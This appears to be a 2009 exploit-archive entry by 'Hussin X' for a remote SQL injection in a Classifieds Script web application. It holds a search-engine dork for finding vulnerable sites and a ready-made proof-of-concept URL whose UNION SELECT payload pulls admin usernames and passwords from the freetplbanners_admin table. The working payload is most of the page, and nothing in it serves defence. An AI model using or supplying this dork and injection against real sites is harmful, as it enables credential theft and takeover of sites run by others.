[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Classifieds Script (type) Remote SQL Injection Vulnerability
# Published : 2009-12-30
# Author : Hussin X
# Previous Title : e-topbiz Slide Popups 1 php (Auth Bypass) SQL Injection Vulnerabilit
# Next Title : Link Trader (lnkid) Remote SQL Injection Vulnerability
Classifieds Script (type) Remote SQL Injection Vulnerability
| Author: Hussin X
|
| Home : www.iq-ty.com<http://www.iq-ty.com>
|
| email: darkangel_g85[at]Yahoo[DoT]com
| d0rk : inurl:"showcategory.php?type"
POC :
http://[server]/showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--
#end
IQ-SecuritY FoRuM